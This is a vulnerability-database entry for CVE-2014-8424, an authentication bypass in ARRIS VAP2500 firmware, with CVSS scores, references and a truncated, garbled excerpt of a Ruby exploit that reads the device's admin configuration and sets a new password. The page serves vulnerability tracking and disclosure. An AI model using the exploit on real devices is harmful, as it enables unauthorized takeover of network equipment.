Recent Vulnerabilities Research Posts Trends Blog About Contact

Published: 28/11/2014 Updated: 28/11/2014

CVSS v2 Base Score: 7.8 | Impact Score: 6.9 | Exploitability Score: 10

VMScore: 785

Vector: AV:N/AC:L/Au:N/C:C/I:N/A:N

ARRIS VAP2500 before FW08.41 does not properly validate passwords, which allows remote malicious users to bypass authentication.

Vulnerable Product	Search on Vulmon	Subscribe to Product
arris vap2500 firmware

#!/usr/bin/env ruby require 'net/http' require 'digest/md5' if !ARGV[0] puts "Usage: #{$0} <vap2500_ip_address>" exit(0) end host = ARGV[0] new_pass = "h4x0r3d!" http = Net::HTTPnew(host)start users = nil users = httprequest_get("/adminconf")bodysplit("\n")map! {|user| usersub(/^(*?),*$/,"\\1")} if users puts "[*] found u ...

CWE-287 http://www.zerodayinitiative.com/advisories/ZDI-14-388/https://nvd.nist.gov https://www.exploit-db.com/exploits/35372/

Get Started

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

CVE-2014-8424

Vulnerability Summary

Exploits

References

Vulmon Search

About

Products

Connect